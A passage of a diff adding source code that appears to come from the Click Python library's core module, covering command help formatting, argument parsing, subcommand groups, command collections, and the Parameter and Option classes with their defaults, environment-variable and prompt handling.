= [] + for param in self.get_params(ctx): + rv = param.get_help_record(ctx) + if rv is not None: + opts.append(rv) + + if opts: + with formatter.section(_("Options")): + formatter.write_dl(opts) + + def format_epilog(self, ctx: Context, formatter: HelpFormatter) -> None: + """Writes the epilog into the formatter if it exists.""" + if self.epilog: + epilog = inspect.cleandoc(self.epilog) + formatter.write_paragraph() + + with formatter.indentation(): + formatter.write_text(epilog) + + def parse_args(self, ctx: Context, args: t.List[str]) -> t.List[str]: + if not args and self.no_args_is_help and not ctx.resilient_parsing: + echo(ctx.get_help(), color=ctx.color) + ctx.exit() + + parser = self.make_parser(ctx) + opts, args, param_order = parser.parse_args(args=args) + + for param in iter_params_for_processing(param_order, self.get_params(ctx)): + value, args = param.handle_parse_result(ctx, opts, args) + + if args and not ctx.allow_extra_args and not ctx.resilient_parsing: + ctx.fail( + ngettext( + "Got unexpected extra argument ({args})", + "Got unexpected extra arguments ({args})", + len(args), + ).format(args=" ".join(map(str, args))) + ) + + ctx.args = args + ctx._opt_prefixes.update(parser._opt_prefixes) + return args + + def invoke(self, ctx: Context) -> t.Any: + """Given a context, this invokes the attached callback (if it exists) + in the right way. + """ + if self.deprecated: + message = _( + "DeprecationWarning: The command {name!r} is deprecated." + ).format(name=self.name) + echo(style(message, fg="red"), err=True) + + if self.callback is not None: + return ctx.invoke(self.callback, **ctx.params) + + def shell_complete(self, ctx: Context, incomplete: str) -> t.List["CompletionItem"]: + """Return a list of completions for the incomplete value. Looks + at the names of options and chained multi-commands. + + :param ctx: Invocation context for this command. + :param incomplete: Value being completed. May be empty. + + .. 
versionadded:: 8.0 + """ + from click.shell_completion import CompletionItem + + results: t.List["CompletionItem"] = [] + + if incomplete and not incomplete[0].isalnum(): + for param in self.get_params(ctx): + if ( + not isinstance(param, Option) + or param.hidden + or ( + not param.multiple + and ctx.get_parameter_source(param.name) # type: ignore + is ParameterSource.COMMANDLINE + ) + ): + continue + + results.extend( + CompletionItem(name, help=param.help) + for name in [*param.opts, *param.secondary_opts] + if name.startswith(incomplete) + ) + + results.extend(super().shell_complete(ctx, incomplete)) + return results + + +class MultiCommand(Command): + """A multi command is the basic implementation of a command that + dispatches to subcommands. The most common version is the + :class:`Group`. + + :param invoke_without_command: this controls how the multi command itself + is invoked. By default it's only invoked + if a subcommand is provided. + :param no_args_is_help: this controls what happens if no arguments are + provided. This option is enabled by default if + `invoke_without_command` is disabled or disabled + if it's enabled. If enabled this will add + ``--help`` as argument if no arguments are + passed. + :param subcommand_metavar: the string that is used in the documentation + to indicate the subcommand place. + :param chain: if this is set to `True` chaining of multiple subcommands + is enabled. This restricts the form of commands in that + they cannot have optional arguments but it allows + multiple commands to be chained together. + :param result_callback: The result callback to attach to this multi + command. This can be set or changed later with the + :meth:`result_callback` decorator. + :param attrs: Other command arguments described in :class:`Command`. + """ + + allow_extra_args = True + allow_interspersed_args = False + + def __init__( + self, + name: t.Optional[str] = None, + invoke_without_command: bool = False, + no_args_is_help: t.Optional[bool] = None, + subcommand_metavar: t.Optional[str] = None, + chain: bool = False, + result_callback: t.Optional[t.Callable[..., t.Any]] = None, + **attrs: t.Any, + ) -> None: + super().__init__(name, **attrs) + + if no_args_is_help is None: + no_args_is_help = not invoke_without_command + + self.no_args_is_help = no_args_is_help + self.invoke_without_command = invoke_without_command + + if subcommand_metavar is None: + if chain: + subcommand_metavar = "COMMAND1 [ARGS]... [COMMAND2 [ARGS]...]..." + else: + subcommand_metavar = "COMMAND [ARGS]..." + + self.subcommand_metavar = subcommand_metavar + self.chain = chain + # The result callback that is stored. This can be set or + # overridden with the :func:`result_callback` decorator. + self._result_callback = result_callback + + if self.chain: + for param in self.params: + if isinstance(param, Argument) and not param.required: + raise RuntimeError( + "Multi commands in chain mode cannot have" + " optional arguments." 
+ ) + + def to_info_dict(self, ctx: Context) -> t.Dict[str, t.Any]: + info_dict = super().to_info_dict(ctx) + commands = {} + + for name in self.list_commands(ctx): + command = self.get_command(ctx, name) + + if command is None: + continue + + sub_ctx = ctx._make_sub_context(command) + + with sub_ctx.scope(cleanup=False): + commands[name] = command.to_info_dict(sub_ctx) + + info_dict.update(commands=commands, chain=self.chain) + return info_dict + + def collect_usage_pieces(self, ctx: Context) -> t.List[str]: + rv = super().collect_usage_pieces(ctx) + rv.append(self.subcommand_metavar) + return rv + + def format_options(self, ctx: Context, formatter: HelpFormatter) -> None: + super().format_options(ctx, formatter) + self.format_commands(ctx, formatter) + + def result_callback(self, replace: bool = False) -> t.Callable[[F], F]: + """Adds a result callback to the command. By default if a + result callback is already registered this will chain them but + this can be disabled with the `replace` parameter. The result + callback is invoked with the return value of the subcommand + (or the list of return values from all subcommands if chaining + is enabled) as well as the parameters as they would be passed + to the main callback. + + Example:: + + @click.group() + @click.option('-i', '--input', default=23) + def cli(input): + return 42 + + @cli.result_callback() + def process_result(result, input): + return result + input + + :param replace: if set to `True` an already existing result + callback will be removed. + + .. versionchanged:: 8.0 + Renamed from ``resultcallback``. + + .. versionadded:: 3.0 + """ + + def decorator(f: F) -> F: + old_callback = self._result_callback + + if old_callback is None or replace: + self._result_callback = f + return f + + def function(__value, *args, **kwargs): # type: ignore + inner = old_callback(__value, *args, **kwargs) + return f(inner, *args, **kwargs) + + self._result_callback = rv = update_wrapper(t.cast(F, function), f) + return rv + + return decorator + + def format_commands(self, ctx: Context, formatter: HelpFormatter) -> None: + """Extra format methods for multi methods that adds all the commands + after the options. + """ + commands = [] + for subcommand in self.list_commands(ctx): + cmd = self.get_command(ctx, subcommand) + # What is this, the tool lied about a command. 
Ignore it + if cmd is None: + continue + if cmd.hidden: + continue + + commands.append((subcommand, cmd)) + + # allow for 3 times the default spacing + if len(commands): + limit = formatter.width - 6 - max(len(cmd[0]) for cmd in commands) + + rows = [] + for subcommand, cmd in commands: + help = cmd.get_short_help_str(limit) + rows.append((subcommand, help)) + + if rows: + with formatter.section(_("Commands")): + formatter.write_dl(rows) + + def parse_args(self, ctx: Context, args: t.List[str]) -> t.List[str]: + if not args and self.no_args_is_help and not ctx.resilient_parsing: + echo(ctx.get_help(), color=ctx.color) + ctx.exit() + + rest = super().parse_args(ctx, args) + + if self.chain: + ctx.protected_args = rest + ctx.args = [] + elif rest: + ctx.protected_args, ctx.args = rest[:1], rest[1:] + + return ctx.args + + def invoke(self, ctx: Context) -> t.Any: + def _process_result(value: t.Any) -> t.Any: + if self._result_callback is not None: + value = ctx.invoke(self._result_callback, value, **ctx.params) + return value + + if not ctx.protected_args: + if self.invoke_without_command: + # No subcommand was invoked, so the result callback is + # invoked with the group return value for regular + # groups, or an empty list for chained groups. + with ctx: + rv = super().invoke(ctx) + return _process_result([] if self.chain else rv) + ctx.fail(_("Missing command.")) + + # Fetch args back out + args = [*ctx.protected_args, *ctx.args] + ctx.args = [] + ctx.protected_args = [] + + # If we're not in chain mode, we only allow the invocation of a + # single command but we also inform the current context about the + # name of the command to invoke. + if not self.chain: + # Make sure the context is entered so we do not clean up + # resources until the result processor has worked. + with ctx: + cmd_name, cmd, args = self.resolve_command(ctx, args) + assert cmd is not None + ctx.invoked_subcommand = cmd_name + super().invoke(ctx) + sub_ctx = cmd.make_context(cmd_name, args, parent=ctx) + with sub_ctx: + return _process_result(sub_ctx.command.invoke(sub_ctx)) + + # In chain mode we create the contexts step by step, but after the + # base command has been invoked. Because at that point we do not + # know the subcommands yet, the invoked subcommand attribute is + # set to ``*`` to inform the command that subcommands are executed + # but nothing else. + with ctx: + ctx.invoked_subcommand = "*" if args else None + super().invoke(ctx) + + # Otherwise we make every single context and invoke them in a + # chain. In that case the return value to the result processor + # is the list of all invoked subcommand's results. + contexts = [] + while args: + cmd_name, cmd, args = self.resolve_command(ctx, args) + assert cmd is not None + sub_ctx = cmd.make_context( + cmd_name, + args, + parent=ctx, + allow_extra_args=True, + allow_interspersed_args=False, + ) + contexts.append(sub_ctx) + args, sub_ctx.args = sub_ctx.args, [] + + rv = [] + for sub_ctx in contexts: + with sub_ctx: + rv.append(sub_ctx.command.invoke(sub_ctx)) + return _process_result(rv) + + def resolve_command( + self, ctx: Context, args: t.List[str] + ) -> t.Tuple[t.Optional[str], t.Optional[Command], t.List[str]]: + cmd_name = make_str(args[0]) + original_cmd_name = cmd_name + + # Get the command + cmd = self.get_command(ctx, cmd_name) + + # If we can't find the command but there is a normalization + # function available, we try with that one. 
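To make the chain-mode dispatch above concrete, a small sketch (the ``pipeline``/``lint``/``test`` names are invented for illustration) of a chained group whose result callback receives the list of subcommand return values:

.. code-block:: python

    import click

    @click.group(chain=True)
    def pipeline():
        """Run one or more steps in a single invocation."""

    @pipeline.command()
    def lint():
        return "lint-ok"

    @pipeline.command()
    def test():
        return "test-ok"

    @pipeline.result_callback()
    def summarize(results):
        # In chain mode every subcommand's return value is collected and
        # the callback receives them as a list, in invocation order.
        click.echo(f"ran {len(results)} step(s): {', '.join(results)}")

    # e.g. `pipeline lint test` prints: ran 2 step(s): lint-ok, test-ok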
+ if cmd is None and ctx.token_normalize_func is not None: + cmd_name = ctx.token_normalize_func(cmd_name) + cmd = self.get_command(ctx, cmd_name) + + # If we don't find the command we want to show an error message + # to the user that it was not provided. However, there is + # something else we should do: if the first argument looks like + # an option we want to kick off parsing again for arguments to + # resolve things like --help which now should go to the main + # place. + if cmd is None and not ctx.resilient_parsing: + if split_opt(cmd_name)[0]: + self.parse_args(ctx, ctx.args) + ctx.fail(_("No such command {name!r}.").format(name=original_cmd_name)) + return cmd_name if cmd else None, cmd, args[1:] + + def get_command(self, ctx: Context, cmd_name: str) -> t.Optional[Command]: + """Given a context and a command name, this returns a + :class:`Command` object if it exists or returns `None`. + """ + raise NotImplementedError + + def list_commands(self, ctx: Context) -> t.List[str]: + """Returns a list of subcommand names in the order they should + appear. + """ + return [] + + def shell_complete(self, ctx: Context, incomplete: str) -> t.List["CompletionItem"]: + """Return a list of completions for the incomplete value. Looks + at the names of options, subcommands, and chained + multi-commands. + + :param ctx: Invocation context for this command. + :param incomplete: Value being completed. May be empty. + + .. versionadded:: 8.0 + """ + from click.shell_completion import CompletionItem + + results = [ + CompletionItem(name, help=command.get_short_help_str()) + for name, command in _complete_visible_commands(ctx, incomplete) + ] + results.extend(super().shell_complete(ctx, incomplete)) + return results + + +class Group(MultiCommand): + """A group allows a command to have subcommands attached. This is + the most common way to implement nesting in Click. + + :param name: The name of the group command. + :param commands: A dict mapping names to :class:`Command` objects. + Can also be a list of :class:`Command`, which will use + :attr:`Command.name` to create the dict. + :param attrs: Other command arguments described in + :class:`MultiCommand`, :class:`Command`, and + :class:`BaseCommand`. + + .. versionchanged:: 8.0 + The ``commands`` argument can be a list of command objects. + """ + + #: If set, this is used by the group's :meth:`command` decorator + #: as the default :class:`Command` class. This is useful to make all + #: subcommands use a custom command class. + #: + #: .. versionadded:: 8.0 + command_class: t.Optional[t.Type[Command]] = None + + #: If set, this is used by the group's :meth:`group` decorator + #: as the default :class:`Group` class. This is useful to make all + #: subgroups use a custom group class. + #: + #: If set to the special value :class:`type` (literally + #: ``group_class = type``), this group's class will be used as the + #: default class. This makes a custom group class continue to make + #: custom groups. + #: + #: .. 
versionadded:: 8.0 + group_class: t.Optional[t.Union[t.Type["Group"], t.Type[type]]] = None + # Literal[type] isn't valid, so use Type[type] + + def __init__( + self, + name: t.Optional[str] = None, + commands: t.Optional[ + t.Union[t.MutableMapping[str, Command], t.Sequence[Command]] + ] = None, + **attrs: t.Any, + ) -> None: + super().__init__(name, **attrs) + + if commands is None: + commands = {} + elif isinstance(commands, abc.Sequence): + commands = {c.name: c for c in commands if c.name is not None} + + #: The registered subcommands by their exported names. + self.commands: t.MutableMapping[str, Command] = commands + + def add_command(self, cmd: Command, name: t.Optional[str] = None) -> None: + """Registers another :class:`Command` with this group. If the name + is not provided, the name of the command is used. + """ + name = name or cmd.name + if name is None: + raise TypeError("Command has no name.") + _check_multicommand(self, name, cmd, register=True) + self.commands[name] = cmd + + @t.overload + def command(self, __func: t.Callable[..., t.Any]) -> Command: + ... + + @t.overload + def command( + self, *args: t.Any, **kwargs: t.Any + ) -> t.Callable[[t.Callable[..., t.Any]], Command]: + ... + + def command( + self, *args: t.Any, **kwargs: t.Any + ) -> t.Union[t.Callable[[t.Callable[..., t.Any]], Command], Command]: + """A shortcut decorator for declaring and attaching a command to + the group. This takes the same arguments as :func:`command` and + immediately registers the created command with this group by + calling :meth:`add_command`. + + To customize the command class used, set the + :attr:`command_class` attribute. + + .. versionchanged:: 8.1 + This decorator can be applied without parentheses. + + .. versionchanged:: 8.0 + Added the :attr:`command_class` attribute. + """ + from .decorators import command + + func: t.Optional[t.Callable[..., t.Any]] = None + + if args and callable(args[0]): + assert ( + len(args) == 1 and not kwargs + ), "Use 'command(**kwargs)(callable)' to provide arguments." + (func,) = args + args = () + + if self.command_class and kwargs.get("cls") is None: + kwargs["cls"] = self.command_class + + def decorator(f: t.Callable[..., t.Any]) -> Command: + cmd: Command = command(*args, **kwargs)(f) + self.add_command(cmd) + return cmd + + if func is not None: + return decorator(func) + + return decorator + + @t.overload + def group(self, __func: t.Callable[..., t.Any]) -> "Group": + ... + + @t.overload + def group( + self, *args: t.Any, **kwargs: t.Any + ) -> t.Callable[[t.Callable[..., t.Any]], "Group"]: + ... + + def group( + self, *args: t.Any, **kwargs: t.Any + ) -> t.Union[t.Callable[[t.Callable[..., t.Any]], "Group"], "Group"]: + """A shortcut decorator for declaring and attaching a group to + the group. This takes the same arguments as :func:`group` and + immediately registers the created group with this group by + calling :meth:`add_command`. + + To customize the group class used, set the :attr:`group_class` + attribute. + + .. versionchanged:: 8.1 + This decorator can be applied without parentheses. + + .. versionchanged:: 8.0 + Added the :attr:`group_class` attribute. + """ + from .decorators import group + + func: t.Optional[t.Callable[..., t.Any]] = None + + if args and callable(args[0]): + assert ( + len(args) == 1 and not kwargs + ), "Use 'group(**kwargs)(callable)' to provide arguments." 
+ (func,) = args + args = () + + if self.group_class is not None and kwargs.get("cls") is None: + if self.group_class is type: + kwargs["cls"] = type(self) + else: + kwargs["cls"] = self.group_class + + def decorator(f: t.Callable[..., t.Any]) -> "Group": + cmd: Group = group(*args, **kwargs)(f) + self.add_command(cmd) + return cmd + + if func is not None: + return decorator(func) + + return decorator + + def get_command(self, ctx: Context, cmd_name: str) -> t.Optional[Command]: + return self.commands.get(cmd_name) + + def list_commands(self, ctx: Context) -> t.List[str]: + return sorted(self.commands) + + +class CommandCollection(MultiCommand): + """A command collection is a multi command that merges multiple multi + commands together into one. This is a straightforward implementation + that accepts a list of different multi commands as sources and + provides all the commands for each of them. + + See :class:`MultiCommand` and :class:`Command` for the description of + ``name`` and ``attrs``. + """ + + def __init__( + self, + name: t.Optional[str] = None, + sources: t.Optional[t.List[MultiCommand]] = None, + **attrs: t.Any, + ) -> None: + super().__init__(name, **attrs) + #: The list of registered multi commands. + self.sources: t.List[MultiCommand] = sources or [] + + def add_source(self, multi_cmd: MultiCommand) -> None: + """Adds a new multi command to the chain dispatcher.""" + self.sources.append(multi_cmd) + + def get_command(self, ctx: Context, cmd_name: str) -> t.Optional[Command]: + for source in self.sources: + rv = source.get_command(ctx, cmd_name) + + if rv is not None: + if self.chain: + _check_multicommand(self, cmd_name, rv) + + return rv + + return None + + def list_commands(self, ctx: Context) -> t.List[str]: + rv: t.Set[str] = set() + + for source in self.sources: + rv.update(source.list_commands(ctx)) + + return sorted(rv) + + +def _check_iter(value: t.Any) -> t.Iterator[t.Any]: + """Check if the value is iterable but not a string. Raises a type + error, or return an iterator over the value. + """ + if isinstance(value, str): + raise TypeError + + return iter(value) + + +class Parameter: + r"""A parameter to a command comes in two versions: they are either + :class:`Option`\s or :class:`Argument`\s. Other subclasses are currently + not supported by design as some of the internals for parsing are + intentionally not finalized. + + Some settings are supported by both options and arguments. + + :param param_decls: the parameter declarations for this option or + argument. This is a list of flags or argument + names. + :param type: the type that should be used. Either a :class:`ParamType` + or a Python type. The latter is converted into the former + automatically if supported. + :param required: controls if this is optional or not. + :param default: the default value if omitted. This can also be a callable, + in which case it's invoked when the default is needed + without any arguments. + :param callback: A function to further process or validate the value + after type conversion. It is called as ``f(ctx, param, value)`` + and must return the value. It is called for all sources, + including prompts. + :param nargs: the number of arguments to match. If not ``1`` the return + value is a tuple instead of single value. The default for + nargs is ``1`` (except if the type is a tuple, then it's + the arity of the tuple). If ``nargs=-1``, all remaining + parameters are collected. + :param metavar: how the value is represented in the help page. 
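A short sketch of ``CommandCollection`` from the chunk above, merging two independent groups into one CLI (the group and command names are invented for illustration):

.. code-block:: python

    import click

    @click.group()
    def base_cli():
        pass

    @base_cli.command()
    def init():
        click.echo("initialized")

    @click.group()
    def plugin_cli():
        pass

    @plugin_cli.command()
    def sync():
        click.echo("synced")

    # Expose `init` and `sync` side by side; sources are searched in order.
    cli = click.CommandCollection(sources=[base_cli, plugin_cli])

    if __name__ == "__main__":
        cli()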
+ :param expose_value: if this is `True` then the value is passed onwards + to the command callback and stored on the context, + otherwise it's skipped. + :param is_eager: eager values are processed before non eager ones. This + should not be set for arguments or it will inverse the + order of processing. + :param envvar: a string or list of strings that are environment variables + that should be checked. + :param shell_complete: A function that returns custom shell + completions. Used instead of the param's type completion if + given. Takes ``ctx, param, incomplete`` and must return a list + of :class:`~click.shell_completion.CompletionItem` or a list of + strings. + + .. versionchanged:: 8.0 + ``process_value`` validates required parameters and bounded + ``nargs``, and invokes the parameter callback before returning + the value. This allows the callback to validate prompts. + ``full_process_value`` is removed. + + .. versionchanged:: 8.0 + ``autocompletion`` is renamed to ``shell_complete`` and has new + semantics described above. The old name is deprecated and will + be removed in 8.1, until then it will be wrapped to match the + new requirements. + + .. versionchanged:: 8.0 + For ``multiple=True, nargs>1``, the default must be a list of + tuples. + + .. versionchanged:: 8.0 + Setting a default is no longer required for ``nargs>1``, it will + default to ``None``. ``multiple=True`` or ``nargs=-1`` will + default to ``()``. + + .. versionchanged:: 7.1 + Empty environment variables are ignored rather than taking the + empty string value. This makes it possible for scripts to clear + variables if they can't unset them. + + .. versionchanged:: 2.0 + Changed signature for parameter callback to also be passed the + parameter. The old callback format will still work, but it will + raise a warning to give you a chance to migrate the code easier. + """ + + param_type_name = "parameter" + + def __init__( + self, + param_decls: t.Optional[t.Sequence[str]] = None, + type: t.Optional[t.Union[types.ParamType, t.Any]] = None, + required: bool = False, + default: t.Optional[t.Union[t.Any, t.Callable[[], t.Any]]] = None, + callback: t.Optional[t.Callable[[Context, "Parameter", t.Any], t.Any]] = None, + nargs: t.Optional[int] = None, + multiple: bool = False, + metavar: t.Optional[str] = None, + expose_value: bool = True, + is_eager: bool = False, + envvar: t.Optional[t.Union[str, t.Sequence[str]]] = None, + shell_complete: t.Optional[ + t.Callable[ + [Context, "Parameter", str], + t.Union[t.List["CompletionItem"], t.List[str]], + ] + ] = None, + ) -> None: + self.name: t.Optional[str] + self.opts: t.List[str] + self.secondary_opts: t.List[str] + self.name, self.opts, self.secondary_opts = self._parse_decls( + param_decls or (), expose_value + ) + self.type: types.ParamType = types.convert_type(type, default) + + # Default nargs to what the type tells us if we have that + # information available. + if nargs is None: + if self.type.is_composite: + nargs = self.type.arity + else: + nargs = 1 + + self.required = required + self.callback = callback + self.nargs = nargs + self.multiple = multiple + self.expose_value = expose_value + self.default = default + self.is_eager = is_eager + self.metavar = metavar + self.envvar = envvar + self._custom_shell_complete = shell_complete + + if __debug__: + if self.type.is_composite and nargs != self.type.arity: + raise ValueError( + f"'nargs' must be {self.type.arity} (or None) for" + f" type {self.type!r}, but it was {nargs}." 
+ ) + + # Skip no default or callable default. + check_default = default if not callable(default) else None + + if check_default is not None: + if multiple: + try: + # Only check the first value against nargs. + check_default = next(_check_iter(check_default), None) + except TypeError: + raise ValueError( + "'default' must be a list when 'multiple' is true." + ) from None + + # Can be None for multiple with empty default. + if nargs != 1 and check_default is not None: + try: + _check_iter(check_default) + except TypeError: + if multiple: + message = ( + "'default' must be a list of lists when 'multiple' is" + " true and 'nargs' != 1." + ) + else: + message = "'default' must be a list when 'nargs' != 1." + + raise ValueError(message) from None + + if nargs > 1 and len(check_default) != nargs: + subject = "item length" if multiple else "length" + raise ValueError( + f"'default' {subject} must match nargs={nargs}." + ) + + def to_info_dict(self) -> t.Dict[str, t.Any]: + """Gather information that could be useful for a tool generating + user-facing documentation. + + Use :meth:`click.Context.to_info_dict` to traverse the entire + CLI structure. + + .. versionadded:: 8.0 + """ + return { + "name": self.name, + "param_type_name": self.param_type_name, + "opts": self.opts, + "secondary_opts": self.secondary_opts, + "type": self.type.to_info_dict(), + "required": self.required, + "nargs": self.nargs, + "multiple": self.multiple, + "default": self.default, + "envvar": self.envvar, + } + + def __repr__(self) -> str: + return f"<{self.__class__.__name__} {self.name}>" + + def _parse_decls( + self, decls: t.Sequence[str], expose_value: bool + ) -> t.Tuple[t.Optional[str], t.List[str], t.List[str]]: + raise NotImplementedError() + + @property + def human_readable_name(self) -> str: + """Returns the human readable name of this parameter. This is the + same as the name for options, but the metavar for arguments. + """ + return self.name # type: ignore + + def make_metavar(self) -> str: + if self.metavar is not None: + return self.metavar + + metavar = self.type.get_metavar(self) + + if metavar is None: + metavar = self.type.name.upper() + + if self.nargs != 1: + metavar += "..." + + return metavar + + @t.overload + def get_default( + self, ctx: Context, call: "te.Literal[True]" = True + ) -> t.Optional[t.Any]: + ... + + @t.overload + def get_default( + self, ctx: Context, call: bool = ... + ) -> t.Optional[t.Union[t.Any, t.Callable[[], t.Any]]]: + ... + + def get_default( + self, ctx: Context, call: bool = True + ) -> t.Optional[t.Union[t.Any, t.Callable[[], t.Any]]]: + """Get the default for the parameter. Tries + :meth:`Context.lookup_default` first, then the local default. + + :param ctx: Current context. + :param call: If the default is a callable, call it. Disable to + return the callable instead. + + .. versionchanged:: 8.0.2 + Type casting is no longer performed when getting a default. + + .. versionchanged:: 8.0.1 + Type casting can fail in resilient parsing mode. Invalid + defaults will not prevent showing help text. + + .. versionchanged:: 8.0 + Looks at ``ctx.default_map`` first. + + .. versionchanged:: 8.0 + Added the ``call`` parameter. 
+ """ + value = ctx.lookup_default(self.name, call=False) # type: ignore + + if value is None: + value = self.default + + if call and callable(value): + value = value() + + return value + + def add_to_parser(self, parser: OptionParser, ctx: Context) -> None: + raise NotImplementedError() + + def consume_value( + self, ctx: Context, opts: t.Mapping[str, t.Any] + ) -> t.Tuple[t.Any, ParameterSource]: + value = opts.get(self.name) # type: ignore + source = ParameterSource.COMMANDLINE + + if value is None: + value = self.value_from_envvar(ctx) + source = ParameterSource.ENVIRONMENT + + if value is None: + value = ctx.lookup_default(self.name) # type: ignore + source = ParameterSource.DEFAULT_MAP + + if value is None: + value = self.get_default(ctx) + source = ParameterSource.DEFAULT + + return value, source + + def type_cast_value(self, ctx: Context, value: t.Any) -> t.Any: + """Convert and validate a value against the option's + :attr:`type`, :attr:`multiple`, and :attr:`nargs`. + """ + if value is None: + return () if self.multiple or self.nargs == -1 else None + + def check_iter(value: t.Any) -> t.Iterator[t.Any]: + try: + return _check_iter(value) + except TypeError: + # This should only happen when passing in args manually, + # the parser should construct an iterable when parsing + # the command line. + raise BadParameter( + _("Value must be an iterable."), ctx=ctx, param=self + ) from None + + if self.nargs == 1 or self.type.is_composite: + + def convert(value: t.Any) -> t.Any: + return self.type(value, param=self, ctx=ctx) + + elif self.nargs == -1: + + def convert(value: t.Any) -> t.Any: # t.Tuple[t.Any, ...] + return tuple(self.type(x, self, ctx) for x in check_iter(value)) + + else: # nargs > 1 + + def convert(value: t.Any) -> t.Any: # t.Tuple[t.Any, ...] 
+ value = tuple(check_iter(value)) + + if len(value) != self.nargs: + raise BadParameter( + ngettext( + "Takes {nargs} values but 1 was given.", + "Takes {nargs} values but {len} were given.", + len(value), + ).format(nargs=self.nargs, len=len(value)), + ctx=ctx, + param=self, + ) + + return tuple(self.type(x, self, ctx) for x in value) + + if self.multiple: + return tuple(convert(x) for x in check_iter(value)) + + return convert(value) + + def value_is_missing(self, value: t.Any) -> bool: + if value is None: + return True + + if (self.nargs != 1 or self.multiple) and value == (): + return True + + return False + + def process_value(self, ctx: Context, value: t.Any) -> t.Any: + value = self.type_cast_value(ctx, value) + + if self.required and self.value_is_missing(value): + raise MissingParameter(ctx=ctx, param=self) + + if self.callback is not None: + value = self.callback(ctx, self, value) + + return value + + def resolve_envvar_value(self, ctx: Context) -> t.Optional[str]: + if self.envvar is None: + return None + + if isinstance(self.envvar, str): + rv = os.environ.get(self.envvar) + + if rv: + return rv + else: + for envvar in self.envvar: + rv = os.environ.get(envvar) + + if rv: + return rv + + return None + + def value_from_envvar(self, ctx: Context) -> t.Optional[t.Any]: + rv: t.Optional[t.Any] = self.resolve_envvar_value(ctx) + + if rv is not None and self.nargs != 1: + rv = self.type.split_envvar_value(rv) + + return rv + + def handle_parse_result( + self, ctx: Context, opts: t.Mapping[str, t.Any], args: t.List[str] + ) -> t.Tuple[t.Any, t.List[str]]: + with augment_usage_errors(ctx, param=self): + value, source = self.consume_value(ctx, opts) + ctx.set_parameter_source(self.name, source) # type: ignore + + try: + value = self.process_value(ctx, value) + except Exception: + if not ctx.resilient_parsing: + raise + + value = None + + if self.expose_value: + ctx.params[self.name] = value # type: ignore + + return value, args + + def get_help_record(self, ctx: Context) -> t.Optional[t.Tuple[str, str]]: + pass + + def get_usage_pieces(self, ctx: Context) -> t.List[str]: + return [] + + def get_error_hint(self, ctx: Context) -> str: + """Get a stringified version of the param for use in error messages to + indicate which param caused the error. + """ + hint_list = self.opts or [self.human_readable_name] + return " / ".join(f"'{x}'" for x in hint_list) + + def shell_complete(self, ctx: Context, incomplete: str) -> t.List["CompletionItem"]: + """Return a list of completions for the incomplete value. If a + ``shell_complete`` function was given during init, it is used. + Otherwise, the :attr:`type` + :meth:`~click.types.ParamType.shell_complete` function is used. + + :param ctx: Invocation context for this command. + :param incomplete: Value being completed. May be empty. + + .. versionadded:: 8.0 + """ + if self._custom_shell_complete is not None: + results = self._custom_shell_complete(ctx, self, incomplete) + + if results and isinstance(results[0], str): + from click.shell_completion import CompletionItem + + results = [CompletionItem(c) for c in results] + + return t.cast(t.List["CompletionItem"], results) + + return self.type.shell_complete(ctx, self, incomplete) + + +class Option(Parameter): + """Options are usually optional values on the command line and + have some extra features that arguments don't have. + + All other parameters are passed onwards to the parameter constructor. + + :param show_default: Show the default value for this option in its + help text. 
Values are not shown by default, unless + :attr:`Context.show_default` is ``True``. If this value is a + string, it shows that string in parentheses instead of the + actual value. This is particularly useful for dynamic options. + For single option boolean flags, the default remains hidden if + its value is ``False``. + :param show_envvar: Controls if an environment variable should be + shown on the help page. Normally, environment variables are not + shown. + :param prompt: If set to ``True`` or a non empty string then the + user will be prompted for input. If set to ``True`` the prompt + will be the option name capitalized. + :param confirmation_prompt: Prompt a second time to confirm the + value if it was prompted for. Can be set to a string instead of + ``True`` to customize the message. + :param prompt_required: If set to ``False``, the user will be + prompted for input only when the option was specified as a flag + without a value. + :param hide_input: If this is ``True`` then the input on the prompt + will be hidden from the user. This is useful for password input. + :param is_flag: forces this option to act as a flag. The default is + auto detection. + :param flag_value: which value should be used for this flag if it's + enabled. This is set to a boolean automatically if + the option string contains a slash to mark two options. + :param multiple: if this is set to `True` then the argument is accepted + multiple times and recorded. This is similar to ``nargs`` + in how it works but supports arbitrary number of + arguments. + :param count: this flag makes an option increment an integer. + :param allow_from_autoenv: if this is enabled then the value of this + parameter will be pulled from an environment + variable in case a prefix is defined on the + context. + :param help: the help string. + :param hidden: hide this option from help outputs. + :param attrs: Other command arguments described in :class:`Parameter`. + + .. versionchanged:: 8.1.0 + Help text indentation is cleaned here instead of only in the + ``@option`` decorator. + + .. versionchanged:: 8.1.0 + The ``show_default`` parameter overrides + ``Context.show_default``. + + .. versionchanged:: 8.1.0 + The default of a single option boolean flag is not shown if the + default value is ``False``. + + .. versionchanged:: 8.0.1 + ``type`` is detected from ``flag_value`` if given. 
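The option behaviours documented above (prompting, confirmation, flag pairs, counting, ``multiple``) compose as in this sketch, which sticks to documented ``@click.option`` parameters:

.. code-block:: python

    import click

    @click.command()
    @click.option("--name", prompt=True, help="Prompted for when not supplied.")
    @click.option("--password", prompt=True, hide_input=True, confirmation_prompt=True)
    @click.option("-v", "--verbose", count=True, help="Repeat for more verbosity.")
    @click.option("--color/--no-color", default=True, show_default=True)
    @click.option("--tag", multiple=True, help="May be given several times.")
    def cli(name, password, verbose, color, tag):
        click.echo(f"name={name} verbose={verbose} color={color} tags={list(tag)}")

    if __name__ == "__main__":
        cli()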
+ """ + + param_type_name = "option" + + def __init__( + self, + param_decls: t.Optional[t.Sequence[str]] = None, + show_default: t.Union[bool, str, None] = None, + prompt: t.Union[bool, str] = False, + confirmation_prompt: t.Union[bool, str] = False, + prompt_required: bool = True, + hide_input: bool = False, + is_flag: t.Optional[bool] = None, + flag_value: t.Optional[t.Any] = None, + multiple: bool = False, + count: bool = False, + allow_from_autoenv: bool = True, + type: t.Optional[t.Union[types.ParamType, t.Any]] = None, + help: t.Optional[str] = None, + hidden: bool = False, + show_choices: bool = True, + show_envvar: bool = False, + **attrs: t.Any, + ) -> None: + if help: + help = inspect.cleandoc(help) + + default_is_missing = "default" not in attrs + super().__init__(param_decls, type=type, multiple=multiple, **attrs) + + if prompt is True: + if self.name is None: + raise TypeError("'name' is required with 'prompt=True'.") + + prompt_text: t.Optional[str] = self.name.replace("_", " ").capitalize() + elif prompt is False: + prompt_text = None + else: + prompt_text = prompt + + self.prompt = prompt_text + self.confirmation_prompt = confirmation_prompt + self.prompt_required = prompt_required + self.hide_input = hide_input + self.hidden = hidden + + # If prompt is enabled but not required, then the option can be + # used as a flag to indicate using prompt or flag_value. + self._flag_needs_value = self.prompt is not None and not self.prompt_required + + if is_flag is None: + if flag_value is not None: + # Implicitly a 